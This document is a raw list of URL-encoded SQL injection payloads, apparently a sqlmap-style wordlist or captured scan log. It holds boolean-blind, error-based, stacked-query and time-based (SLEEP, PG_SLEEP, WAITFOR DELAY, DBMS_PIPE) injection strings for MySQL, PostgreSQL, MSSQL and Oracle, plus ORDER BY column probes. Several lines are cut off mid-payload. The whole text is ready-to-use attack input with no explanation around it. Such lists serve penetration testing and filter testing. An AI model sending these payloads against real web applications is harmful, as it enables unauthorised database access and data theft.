)%20AND%204240=4623%20AND%20(9554=9554
%20AND%202347=4934
')%20AND%206811=1045%20AND%20('jyZF'='jyZF
"%20AND%205218=5218%20AND%20"PCuT"="PCuT
%20AND%205218=5218--%20PHPs
)%20AND%206982=(SELECT%20(CASE%20WHEN%20(6982=8620)%20THEN%206982%20ELSE%20(SELECT%208620%20UNION%20SELECT%209809)%20END))--%20ORym
)%20AND%202384=(SELECT%20(CASE%20WHEN%20(2384=2384)%20THEN%202384%20ELSE%20(SELECT%20
)%20AND%208416=7946--%20xuSz
%'%20AND%203560=3560--%20BeVm
")%20AND%201762=3
)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(9866=7519)%20THEN%203600000930
%'%20RLIKE%20(SELECT%20(CASE%20WHEN%20(2983=5
%'%20RLIKE%20(SELECT%20(CASE%20WHEN%20(2716=2716)%20THEN%203600000930
)%20AND%20(SELECT%20(CASE%20WHEN%20(7765=67
)%20AND%20(SELECT%20(CASE%20WHEN%20(8262=8262)%20THEN%20NULL%20ELSE%20CAST((CHR(114)||CHR(66)||CHR(105)||CHR(87))%20AS%20NUMERIC)%20END))%20IS%20NULL%20AND%20(8576=8576
))%20AND%20(SELECT%20(CASE%20WHEN%20(9625=7554)%20THEN%20NULL%20ELSE%20CAST((CHR(112)||CHR(80)||CHR(88)||CHR(82))%20AS%20NUMERIC)%20END))%20IS%20NULL%20AND%20((7494=7494
'))%20AND%20(SELECT%20(CASE%20WHEN%20(8262=8262)%20THEN%20NULL%20ELSE%20CAST((CHR(114)||CHR(66)||CHR(105)||CHR(87))%20AS%20NUMERIC)%20END))%20IS%20NULL%20AND%20(('xfrj'='xfrj
'%20AND%20(SELECT%20(CASE%20WHEN%20(8267=5364)%20THEN%20NULL%20ELSE%20CAST((CHR(65)||CHR(
'%20AND%20(SELECT%20(CASE%20WHEN%20(8262=8262)%20THEN%20NULL%20ELSE%20CAST((CHR(114)||CHR(66)||CHR(105)||CHR(87))%20AS%20NUMERIC)%20END))%20IS%20NULL%20AND%20'qxbv'='qxbv
"%20AND%20(SELECT%20(CASE%20WHEN%20(8262=8262)%20THEN%20NULL%20ELSE%20CAST((CHR(114)||CHR(66)||CHR(105)||CHR(87))%20AS%20NUMERIC)%20END))%20IS%20NULL%20AND%20"FuYS"="FuYS
%20AND%20(SELECT%20(CASE%20WHEN%20(60
))%20AND%20(SELECT%20(CASE%20WHEN%20(2533=2533)%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN(1,2533)%20END)%20FROM%20DUAL)%20IS%20NULL%20AND%20((5384=5384
%20AND%20(SELECT%20(CASE%20WHEN%20(
%20AND%20(SELECT%20(CASE%20WHEN%20(2533=2533)%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN(1,2533)%20END)%20FROM%20DUAL)%20IS%20NULL
'))%20AND%20(SELECT%20(CASE%20WHEN%20(2533=2533)%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN(1,2533)%20END)%20FROM%20DUAL)%20IS%20NULL%20AND%20(('hHyQ'='hHyQ
'%20AND%20(SELECT%20(CASE%20WHEN%20(40
'%20AND%20(SELECT%20(CASE%20WHEN%20(2533=2533)%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN(1,2533)%20END)%20FROM%20DUAL)%20IS%20NULL%20AND%20'ABhm'='ABhm
%20AND%20(SELECT%20(CASE%20WHEN%20(2533=2533)%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN(1,2533)%20END)%20FROM%20DUAL)%20IS%20NULL--%20rWRa
%20ELSE%20(SELECT%202745%20UNION%20SELECT%205684)%20END))
,(SELECT%20(CASE%20WHEN%20(4255=4997)%20THEN%201%20ELSE%204255*(SELECT%204255%20FROM%20INFORMATION_SCHEMA.PLUGINS)%20END))
,(SELECT%20(CASE%20WHEN%20(6358=4194)%20THEN%201%20ELSE%201/(SELECT%200)%20END))
)%20AND%20(SELECT%209983%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717871,(SELECT%20(ELT(9983=9983,1))),0x71766a7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20(8284=8284
))%20AND%20(SELECT%209983%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717871,(SELECT%20(ELT(9983=9983,1))),0x71766a7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20((8094=8094
%20AND%20(SELECT%209983%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717871,(SELECT%20(ELT(9983=9983,1))),0x71766a7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20TnZk
)%20AND%20EXTRACTVALUE(4559,CONCAT(0x5c,0x7171717871,(SELECT%20(ELT(4559=4559,1))),0x71766a7a71))%20AND%20(5392=5392
%20AND%20EXTRACTVALUE(4559,CONCAT(0x5c,0x7171717871,(SELECT%20(ELT(4559=4559,1))),0x71766a7a71))
)%20AND%20ROW(9108,1706)>(SELECT%20COUNT(*),CONCAT(0x7171717871,(SELECT%20(ELT(9108=9108,1))),0x71766a7a71,FLOOR(RAND(0)*2))x%20FROM%20(SELECT%205855%20UNION%20SELECT%208082%20UNION%20SELECT%204045%20UNION%20SELECT%208488)a%20GROUP%20BY%20x)%20AND%20(9745=9745
))%20AND%20ROW(9108,1706)>(SELECT%20COUNT(*),CONCAT(0x7171717871,(SELECT%20(ELT(9108=9108,1))),0x71766a7a71,FLOOR(RAND(0)*2))x%20FROM%20(SELECT%205855%20UNION%20SELECT%208082%20UNION%20SELECT%204045%20UNION%20SELECT%208488)a%20GROUP%20BY%20x)%20AND%20((5678=5678
)%20AND%205327=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113))||(SELECT%20(CASE%20WHEN%20(5327=5327)%20THEN%201%20ELSE%200%20END))::text||(CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113))%20AS%20NUMERIC)%20AND%20(9129=9129
))%20AND%205327=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113))||(SELECT%20(CASE%20WHEN%20(5327=5327)%20THEN%201%20ELSE%200%20END))::text||(CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113))%20AS%20NUMERIC)%20AND%20((7019=7019
)%20AND%208093%20IN%20(SELECT%20(CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(8093=8093)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)))%20AND%20(2774=2774
%20AND%208093%20IN%20(SELECT%20(CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(8093=8093)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)))--%20JArx
)%20AND%209693=CONVERT(INT,(SELECT%20CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(9693=9693)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)))%20AND%20(5510=5510
%20AND%209693=CONVERT(INT,(SELECT%20CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(9693=9693)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)))--%20BKHi
)%20AND%204984=CONCAT(CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113),(SELECT%20(CASE%20WHEN%20(4984=4984)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END)),CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113))%20AND%20(3655=3655
))%20AND%204984=CONCAT(CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113),(SELECT%20(CASE%20WHEN%20(4984=4984)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END)),CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113))%20AND%20((6013=6013
%20AND%204984=CONCAT(CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113),(SELECT%20(CASE%20WHEN%20(4984=4984)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END)),CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113))--%20yDxz
)%20AND%206834=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||(SELECT%20(CASE%20WHEN%20(6834=6834)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20(1063=1063
))%20AND%206834=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||(SELECT%20(CASE%20WHEN%20(6834=6834)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20((1275=1275
)%20AND%208469=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||(SELECT%20(CASE%20WHEN%20(8469=8469)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113))%20AND%20(6129=6129
))%20AND%208469=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||(SELECT%20(CASE%20WHEN%20(8469=8469)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113))%20AND%20((1902=1902
)%20PROCEDURE%20ANALYSE(EXTRACTVALUE(4415,CONCAT(0x5c,0x7171717871,(SELECT%20(CASE%20WHEN%20(4415=4415)%20THEN%201%20ELSE%200%20END)),0x71766a7a71)),1)%20AND%20(3
))%20PROCEDURE%20ANALYSE(EXTRACTVALUE(4415,CONCAT(0x5c,0x7171717871,(SELECT%20(CASE%20WHEN%20(4415=4415)%20THEN%201%20ELSE%200%20END)),0x71766a7a71)),1)%20AND%20((78
);DECLARE%20@oEkX%20NVARCHAR(4000);SET%20@oEkX=(SELECT%20'qqqxq'+(SELECT%20(CASE%20WHEN%20(5433=5433)%20THEN%20'1'%20ELSE%20'0'%20END))+'qvjzq');EXEC%20@oEkX--
";DECLARE%20@oEkX%20NVARCHAR(4000);SET%20@oEkX=(SELECT%20'qqqxq'+(SELECT%20(CASE%20WHEN%20(5433=5433)%20THEN%20'1'%20ELSE%20'0'%20END))+'qvjzq');EXEC%20@oEkX--
);SELECT%20SLEEP(5)%23
";SELECT%20PG_SLEEP(5)--
);WAITFOR%20DELAY%20'0:0:5'--
));WAITFOR%20DELAY%20'0:0:5'--
";WAITFOR%20DELAY%20'0:0:5'--
);DECLARE%20@x%20CHAR(9);SET%20@x=0x303a303a35;WAITFOR%20DELAY%20@x--
));DECLARE%20@x%20CHAR(9);SET%20@x=0x303a303a35;WAITFOR%20DELAY%20@x--
";DECLARE%20@x%20CHAR(9);SET%20@x=0x303a303a35;WAITFOR%20DELAY%20@x--
));SELECT%20DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(107)||CHR(75)||CHR(104),5)%20FROM%20DUAL--
%20AND%20(SELECT%203833%20FROM%20(SELECT(SLEEP(5)))yIZN)
%20AND%20(SELECT%203833%20FROM%20(SELECT(SLEEP(5)))yIZN)--%20CYHL
)%20AND%20SLEEP(5)%20AND%20(2591=2591
))%20AND%20SLEEP(5)%20AND%20((6904=6904
%20AND%20SLEEP(5)
')%20AND%20SLEEP(5)%20AND%20('TwRu'='TwRu
'))%20AND%20SLEEP(5)%20AND%20(('Intm'='Intm
'%20AND%20SLEEP(5)%20AND%20'fiwE'='fiwE
')%20AND%20SLEEP(5)%20AND%20('HTSv'%20LIKE%20'HTSv
%'%20AND%20SLEEP(5)%20AND%20'ARPP%'='ARPP
'%20AND%20SLEEP(5)%20AND%20'zipQ'%20LIKE%20'zipQ
")%20AND%20SLEEP(5)%20AND%20("ARGR"="ARGR
"%20AND%20SLEEP(5)%20AND%20"iguY"="iguY
%20AND%20SLEEP(5)--%20plzR
)%20RLIKE%20SLEEP(5)%20AND%20(5955=5955
))%20RLIKE%20SLEEP(5)%20AND%20((4422=4422
%20RLIKE%20SLEEP(5)
'%20RLIKE%20SLEEP(5)%20AND%20'nIgA'%20LIKE%20'nIgA
")%20RLIKE%20SLEEP(5)%20AND%20("Mfae"="Mfae
"%20RLIKE%20SLEEP(5)%20AND%20"tyPl"="tyPl
%20RLIKE%20SLEEP(5)--%20wFiS
))%20AND%203082=(SELECT%203082%20FROM%20PG_SLEEP(5))%20AND%20((7419=7419
%20AND%203082=(SELECT%203082%20FROM%20PG_SLEEP(5))
')%20AND%203082=(SELECT%203082%20FROM%20PG_SLEEP(5))%20AND%20('LtkI'='LtkI
)%20WAITFOR%20DELAY%20'0:0:5'%20AND%20(9131=9131
))%20WAITFOR%20DELAY%20'0:0:5'%20AND%20((8402=8402
%20WAITFOR%20DELAY%20'0:0:5'
')%20WAITFOR%20DELAY%20'0:0:5'%20AND%20('GiAi'='GiAi
'))%20WAITFOR%20DELAY%20'0:0:5'%20AND%20(('UHIz'='UHIz
'%20WAITFOR%20DELAY%20'0:0:5'%20AND%20'qzgm'='qzgm
')%20WAITFOR%20DELAY%20'0:0:5'%20AND%20('lMbL'%20LIKE%20'lMbL
%'%20WAITFOR%20DELAY%20'0:0:5'%20AND%20'LfoT%'='LfoT
'%20WAITFOR%20DELAY%20'0:0:5'%20AND%20'aNRz'%20LIKE%20'aNRz
")%20WAITFOR%20DELAY%20'0:0:5'%20AND%20("UpYA"="UpYA
"%20WAITFOR%20DELAY%20'0:0:5'%20AND%20"FjgU"="FjgU
%20WAITFOR%20DELAY%20'0:0:5'--%20tQcl
)%20AND%203628=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(69)||CHR(112)||CHR(71),5)%20AND%20(9011=9011
))%20AND%203628=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(69)||CHR(112)||CHR(71),5)%20AND%20((4863=4863
%20AND%203628=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(69)||CHR(112)||CHR(71),5)
%20AND%203628=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(69)||CHR(112)||CHR(71),5)--%20SOam
)%20ORDER%20BY%201--%20zmEF
%'%20ORDER%20BY%201%23
'%20ORDER%20BY%201%23
")%20ORDER%20BY%201%23
"%20ORDER%20BY%201%23
%20ORDER%20BY%201%23
